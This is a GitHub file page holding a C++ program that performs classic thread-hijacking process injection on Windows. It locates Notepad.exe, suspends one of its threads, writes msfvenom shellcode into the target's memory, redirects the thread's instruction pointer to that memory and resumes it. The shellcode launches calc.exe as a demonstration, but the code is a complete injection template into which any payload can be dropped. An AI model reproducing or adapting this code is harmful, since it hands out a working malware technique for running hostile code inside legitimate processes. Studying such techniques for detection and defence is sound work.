-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathClassicThreadHijacking.cpp
More file actions
121 lines (99 loc) · 4.36 KB
/
ClassicThreadHijacking.cpp
File metadata and controls
121 lines (99 loc) · 4.36 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
#include <Windows.h>
#include <stdio.h>
#include <TlHelp32.h>
DWORD getPID() {
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create a snapshot! Exiting with error: %ld\n", GetLastError());
printf("[!] Failed to enum process.\n");
return EXIT_FAILURE;
}
printf("[*] Snapshot taken successfully for process enum!\n");
PROCESSENTRY32 pe32 = { 0 };
pe32.dwSize = sizeof(PROCESSENTRY32);
if (Process32First(hSnapshot, &pe32)) {
while (Process32Next(hSnapshot, &pe32)) {
if (_wcsicmp(pe32.szExeFile, L"Notepad.exe") == 0) {
return pe32.th32ProcessID;
break;
}
}
}
}
int main() {
DWORD PID = getPID();
printf("[+] PID of target process [Notepad.exe] is %ld\n", PID);
//shellcode for calc.exe generated using msfvenom
unsigned char shellcode[] =
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50"
"\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52"
"\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a"
"\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41"
"\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52"
"\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88\x00\x00\x00\x48"
"\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44\x8b\x40"
"\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48"
"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41"
"\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1"
"\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c"
"\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01"
"\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a"
"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48\x8b"
"\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b"
"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd"
"\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0"
"\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff"
"\xd5\x63\x61\x6c\x63\x2e\x65\x78\x65\x00";
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
printf("[!] Failed to create snapshot for thread enum! Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[*] Snapshot taken successfully for thread enum.\n");
THREADENTRY32 te32 = { 0 };
te32.dwSize = sizeof(THREADENTRY32);
HANDLE hThreadHijacked = NULL;
DWORD oldprotect = NULL;
CONTEXT context = { 0 };
context.ContextFlags = CONTEXT_FULL;
Thread32First(hSnapshot, &te32);
while (Thread32Next(hSnapshot, &te32) == TRUE) {
if (te32.th32OwnerProcessID == PID) {
hThreadHijacked = OpenThread(THREAD_ALL_ACCESS, FALSE, te32.th32ThreadID);
break;
}
}
SuspendThread(hThreadHijacked);
printf("[+] TID of target thread is %ld\n", te32.th32ThreadID);
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
if (hProcess == NULL) {
printf("[!] Failed to open an handle to target process. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Got an handle to target process.\n");
LPVOID virtualmem = VirtualAllocEx(hProcess, NULL, sizeof(shellcode), (MEM_COMMIT | MEM_RESERVE), PAGE_READWRITE);
if (virtualmem == NULL) {
printf("[!] Failed to allocate memory. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Allocated memory for the shellcode.\n\t\\----0x%p\n", virtualmem);
if (!VirtualProtectEx(hProcess, virtualmem, sizeof(shellcode), PAGE_EXECUTE_READ, &oldprotect)) {
printf("[!] Failed to change memory protection. Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Memory protection change from PAGE_READWRITE to PAGE_EXECUTE_READ\n");
if (!WriteProcessMemory(hProcess, virtualmem, shellcode, sizeof(shellcode), NULL)) {
printf("[!] Failed to write shellcode into memory! Exiting with error: %ld\n", GetLastError());
return EXIT_FAILURE;
}
printf("[+] Shellcode written into memory.\n\t\\----0x%p\n", shellcode);
GetThreadContext(hThreadHijacked, &context);
printf("[*] Getting the context of hijacked thread.\n");
context.Rip = (DWORD_PTR)virtualmem;
SetThreadContext(hThreadHijacked, &context);
printf("[+] Changed the context of hijacked thread.\n");
ResumeThread(hThreadHijacked);
printf("[+] Executed the hijacked thread!\n");
printf("[+] Shellcode executed successfully!\n");
}